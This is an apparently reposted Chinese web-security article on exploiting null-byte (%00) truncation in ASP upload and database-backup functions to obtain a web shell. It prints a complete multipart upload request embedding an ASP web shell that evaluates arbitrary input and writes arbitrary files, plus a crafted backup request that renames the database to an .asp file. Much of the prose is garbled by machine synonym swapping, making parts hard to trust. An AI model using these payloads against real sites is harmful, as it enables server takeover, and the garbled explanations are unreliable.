|
|
|
联系客服020-83701501

上传漏洞filepath变量-00截断

联系在线客服,可以获得免费在线咨询服务。 QQ咨询 我要预约
上传裂痕filepath变量\00截断

POST /conn/upload.asp?action=upfile HTTP/1.1

Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */* Referer: 迩来phpwind的包孕裂痕,小菜不停想操纵外地包孕来停止拿shell,竟创举在魔术引号为off的情况下,%00可能截断,从而等闲结构我们所需变量不外克期我们探究的话题不是这个而是一个很经典的上传?0截断filepath,管教文件后缀。 下面是一个上传以后的包: upload/2010/2/201002232155064073.gif —————————–7d9138191ce08bc Content-Disposition: form-data; name=”valcode” 6918 —————————–7d9138191ce08bc Content-Disposition: form-data; name=”file_name1″; filename=”D:91ri.orgxiaoma.gif” Content-Type: text/plain <%eval request(“#”)%> <%on error resume next%> <%ofso=”scripting.filesystemobject”%> <%set fso=server.createobject(ofso)%> <%path=request(“path”)%> <%if path<>”” then%> <%data=request(“dama”)%> <%set dama=fso.createtextfile(path,true)%> <%dama.write data%> <%if err=0 then%> <%=”success”%> <%else%> <%=”false”%> <%end if%> <%err.clear%> <%end if%> <%dama.close%> <%set dama=nothing%> <%set fos=nothing%> <%=”<form action=” method=post>”%> <%=”<input type=text name=path>”%> <%=”<br>”%> <%=server.mappath(request.servervariables(“script_name”))%> <%=”<br>”%> <%=””%> <%=”<textarea name=dama cols=70 rows=30 width=30></textarea>”%> <%=”<br>”%> <%=”<input type=submit value=save>”%> <%=”</form>”%> —————————–7d9138191ce08bc Content-Disposition: form-data; name=”submit” 上 传 —————————–7d9138191ce08bc– 假定不出不测,我们可能上传获得我们的网站shell了 我们在实践中,往往碰着一类配景,有备份,但是备份的文件尾他给你加个.mdb,好比部属这段代码 sub backupdata() Dbpath=request.form(“Dbpath”) Dbpath=server.mappath(Dbpath) bkfolder=request.form(“bkfolder”) bkdbname=request.form(“bkdbname”) Set Fso=server.createobject(“scripting.filesystemobject”) if fso.fileexists(dbpath) then If CheckDir(bkfolder) = True Then response.write bkfolder& “”& bkdbname & “.mdb” ‘为了都雅,我给他打印进去 fso.copyfile dbpath,bkfolder& “”& bkdbname & “.mdb” else MakeNewsDir bkfolder fso.copyfile dbpath,bkfolder& “”& bkdbname & “.mdb” end if response.write “数据库备份实现,请停止此外操纵!确立利用FTP 器械将数据库备份,以保障数据安全” else response.write “找不到您所需要备份的文件!” end if end sub Function CheckDir(FolderPath) folderpath=Server.MapPath(“.”)&””&folderpath Set fso1 = CreateObject(“Scripting.FileSystemObject”)

 

If fso1.FolderExists(FolderPath) then CheckDir = True Else CheckDir = False End if Set fso1 = nothing End Function Function MakeNewsDir(foldername) Set fso1 = CreateObject(“Scripting.FileSystemObject”) Set f = fso1.CreateFolder(foldername) MakeNewsDir = True Set fso1 = nothing End Function 通常的想法,我们是备份成1.asp;asp.mdb如许的模式来拿网站shell 但是假定很遗憾,我们碰着的是iis7兴许apache的服务器呢? 小菜自以为聪白的也想来一次截断 下列是批改后的包 POST /bjxshop/admin/Backup.asp?action=Backup HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */* Referer: http://localhost/bjxshop/admin/backup.asp Accept-Language: zh-cn Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Host: localhost Content-Length: 79 Connection: Keep-Alive Cache-Control: no-cache Cookie: ASPSESSIONIDCSASTTAR=EGGPAIHBCAHNKPGPOEOOKIFB DBpath=..%2Fdata%2F%23bjxshop.mdb&bkfolder=..%2FDatabackup&bkDBname=shop.asp%00 因为url编码转换。。0变成%00 nc提交以后获得,好像和构思中的有点出入??shop.asp.mdb 并不有截断! 以上是在本机iis5.0测试 搜索枯肠了许久,到底有颔首绪了 网上找了点质料加外地测试了下 <% if request.queryString<>”” then ? ? ? ? id=request.queryString(“id”) ? ? ? ? response.write “Get:” ? ? ? ? response.write id&”.mdb” end if %> 留存为re.asp 提交re.asp?id=111%00111 获得保管%00畴昔的字符 这即是request的时候出的题目,request(“参数”)碰着%00主动接连,抛却%00以及以后的字符 那为何上面filepath变量可能停止截断呢? 比拟一下这两种包的分歧 通常上传文件的表单 enctype=”multipart/form-data” 是这种格式的 而平居表单 不定义格式, 默认为:Content-Type: application/x-www-form-urlencoded 具体分歧可能参照:无组件上传类的道理(我自身也没写过,太贫穷难题了,不外可能熟习下) enctype=”multipart/form-data” 这种格式的上传的是一个文件表单,我们的无组件上传类必须对其形式停止接洽(有固定格式),获得文件名,文件形式,途径值,因为途径值是接洽获得的 所以,保管了0这个罪恶的标识表记标帜,带入留存,败北。 ps:在测试pw外地包孕裂痕时,大约是php的机制原因,get参数中的%00也带了进去哦 以上是个人的一点小效果,大约对你们拿shell没什么扶直,不外作为自身实前进去的一点器械照样有点小傲慢的

本文摘自网络由网络安全攻防研讨室(www.91ri.org) 动静安全小组搜集整理.转载本文请驰名原文地点及原作者版权动静。

数安新闻+更多

证书相关+更多